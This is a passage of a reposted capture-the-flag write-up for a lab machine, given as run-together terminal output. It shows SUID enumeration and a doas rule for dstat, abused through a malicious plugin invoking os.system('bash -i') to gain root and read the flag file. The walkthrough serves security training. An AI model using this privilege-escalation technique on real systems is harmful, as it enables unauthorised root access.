‘/var/lib/nginx/uwsgi’: Permission deniedfind: ‘/var/lib/nginx/body’: Permission deniedfind: ‘/var/lib/mysql-files’: Permission deniedfind: ‘/var/lib/udisks2’: Permission deniedfind: ‘/var/lib/mysql-keyring’: Permission deniedfind: ‘/var/cache/ldconfig’: Permission deniedfind: ‘/var/cache/apt/archives/partial’: Permission deniedfind: ‘/var/cache/pollinate’: Permission deniedfind: ‘/var/cache/private’: Permission deniedfind: ‘/var/cache/apparmor/f4764548.0’: Permission deniedfind: ‘/var/cache/apparmor/26b63962.0’: Permission deniedfind: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-2Jc3Qh’: Permission deniedfind: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-AZNBGh’: Permission deniedfind: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-gQS10e’: Permission deniedfind: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-brjMyf’: Permission deniedfind: ‘/var/log/mysql’: Permission deniedfind: ‘/var/log/private’: Permission deniedfind: ‘/var/log/audit’: Permission deniedfind: ‘/var/snap/lxd/common/lxd’: Permission deniedfind: ‘/etc/multipath’: Permission deniedfind: ‘/etc/polkit-1/localauthority’: Permission deniedfind: ‘/etc/audisp’: Permission deniedfind: ‘/etc/sudoers.d’: Permission deniedfind: ‘/etc/audit’: Permission deniedfind: ‘/etc/ssl/private’: Permission deniedfind: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-pA8l0f’: Permission deniedfind: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-2klkjg’: Permission deniedfind: ‘/tmp/vmware-root_667-3980363901’: Permission deniedfind: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-ltRDmi’: Permission deniedfind: ‘/tmp/snap-private-tmp’: Permission deniedfind: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-IA1Phh’: Permission deniedfind: ‘/proc/tty/driver’: Permission deniedfind: ‘/lost+found’: Permission deniedfind: ‘/root’: Permission deniedfind: ‘/snap/core20/1695/etc/ssl/private’: Permission deniedfind: ‘/snap/core20/1695/root’: Permission deniedfind: ‘/snap/core20/1695/var/cache/ldconfig’: Permission deniedfind: ‘/snap/core20/1695/var/cache/private’: Permission deniedfind: ‘/snap/core20/1695/var/lib/private’: Permission deniedfind: ‘/snap/core20/1695/var/lib/snapd/void’: Permission deniedplayer@soccer:~$ cat /usr/local/etc/doas.confpermit nopass player as root cmd /usr/bin/dstatplayer@soccer:~$ dstat -hUsage: dstat [-afv] [options..] [delay [count]]Versatile tool for generating system resource statistics)Dstat options: -c, --cpu enable cpu stats -C 0,3,total include cpu0, cpu3 and total -d, --disk enable disk stats -D total,hda include hda and total -g, --page enable page stats -i, --int enable interrupt stats -I 5,eth2 include int5 and interrupt used by eth2 -l, --load enable load stats -m, --mem enable memory stats -n, --net enable network stats -N eth1,total include eth1 and total -p, --proc enable process stats -r, --io enable io stats (I/O requests completed) -s, --swap enable swap stats -S swap1,total include swap1 and total -t, --time enable time/date output -T, --epoch enable time counter (seconds since epoch) -y, --sys enable system stats --aio enable aio stats --fs, --filesystem enable fs stats --ipc enable ipc stats --lock enable lock stats --raw enable raw stats --socket enable socket stats --tcp enable tcp stats --udp enable udp stats --unix enable unix stats --vm enable vm stats --vm-adv enable advanced vm stats --zones enable zoneinfo stats --list list all available plugins --<plugin-name> enable external plugin by name (see --list) -a, --all equals -cdngy (default) -f, --full automatically expand -C, -D, -I, -N and -S lists -v, --vmstat equals -pmgdsc -D total --bits force bits for values expressed in bytes --float force float values on screen --integer force integer values on screen --bw, --black-on-white change colors for white background terminal --color force colors --nocolor disable colors --noheaders disable repetitive headers --noupdate disable intermediate updates --output file write CSV output to file --profile show profiling statistics when exiting dstatdelay is the delay in seconds between each update (default: 1)count is the number of updates to display before exiting (default: unlimited)player@soccer:~$ dstat 3 10--total-cpu-usage-- -dsk/total- -net/total- ---paging-- ---system--usr sys idl wai stl| read writ| recv send| in out | int csw 1 0 99 0 0| 234M 224M| 0 0 | 0 0 |6373k 12M 0 0 99 0 0| 0 0 | 178B 538B| 0 0 | 253 483 0 0 100 0 0| 0 0 | 103B 331B| 0 0 | 252 491 ^Cplayer@soccer:~$ cd /usr/local/share/dstat/player@soccer:/usr/local/share/dstat$ lsplayer@soccer:/usr/local/share/dstat$ echo "import os"import osplayer@soccer:/usr/local/share/dstat$ player@soccer:/usr/local/share/dstat$ os.system('bash -i')-bash: syntax error near unexpected token `'bash -i''player@soccer:/usr/local/share/dstat$ player@soccer:/usr/local/share/dstat$ vim dstat_pe.pytplayer@soccer:/usr/local/share/dstat$ vim dstat_pe.pyplayer@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat peYou did not select any stats, using -cdngy by default.dstat: incorrect argument, try dstat -h for the correct syntaxplayer@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --pe/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses import improot@soccer:/usr/local/share/dstat# root@soccer:/usr/local/share/dstat# iduid=0(root) gid=0(root) groups=0(root)root@soccer:/usr/local/share/dstat# pwd/usr/local/share/dstatroot@soccer:/usr/local/share/dstat# cd /rootroot@soccer:~# lsapp root.txt run.sql snaproot@soccer:~# cat root.txt 01fd0d3dafe0d3b083a6c69f84154f06root@soccer:~# cat run.sql delete from soccer_db.accounts where id != 1324;root@soccer:~# 
So we get the flag!
try suid
uid=33(www-data) gid=33(www-data) groups=33(www-data)find / -user root -perm -4000 -print 2>/dev/null/usr/local/bin/doas/usr/lib/snapd/snap-confine/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/openssh/ssh-keysign/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/eject/dmcrypt-get-device/usr/bin/umount/usr/bin/fusermount/usr/bin/mount/usr/bin/su/usr/bin/newgrp/usr/bin/chfn/usr/bin/sudo/usr/bin/passwd/usr/bin/gpasswd/usr/bin/chsh/snap/snapd/17883/usr/lib/snapd/snap-confine/snap/core20/1695/usr/bin/chfn/snap/core20/1695/usr/bin/chsh/snap/core20/1695/usr/bin/gpasswd/snap/core20/1695/usr/bin/mount/snap/core20/1695/usr/bin/newgrp/snap/core20/1695/usr/bin/passwd/snap/core20/1695/usr/bin/su/snap/core20/1695/usr/bin/sudo/snap/core20/1695/usr/bin/umount/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1695/usr/lib/openssh/ssh-keysignthis is another try
来源地址:https://blog.csdn.net/m0_47210241/article/details/129651631
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
